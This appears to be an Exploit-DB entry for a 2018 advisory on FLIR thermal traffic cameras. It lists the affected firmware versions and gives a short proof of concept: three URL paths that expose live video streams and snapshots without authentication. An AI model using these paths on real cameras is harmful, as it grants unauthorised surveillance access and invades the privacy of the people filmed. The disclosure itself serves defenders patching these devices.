Vulnerability Key Information Vulnerability Title FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure EDB-ID 45537 CVE N/A Author LIQUIDWORM Type WEBAPPS Platform HARDWARE Date 2018-10-06 Vulnerable Application Not specified Affected Firmware Versions V1.01-0bb5b27 (TrafiOne) [Codename: TrafiOne] E1.00.09 (TI BPL2 EDGE) [Codename: TIIP4EDGE] V1.02.P01 (TI x-stream) [Codename: TIIP2] V1.05.P01 (ThermiCam) [Codename: ThermiCam] V1.04.P02 (ThermiCam) [Codename: ThermiCam] V1.04 (ThermiCam) [Codename: ThermiCam] V1.01.P02 (ThermiCam) [名: ThermiCam] Description FLIR thermal traffic cameras are vulnerable to unauthorized and unauthenticated access to live RTSP video streams. Simple PoC http://Target/live.mjpeg?id=1 rtsp://Target/mpeg4 http://Target/snapshot.jpg Advisory ID ZSL-2018-5489 Advisory URL https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5489.php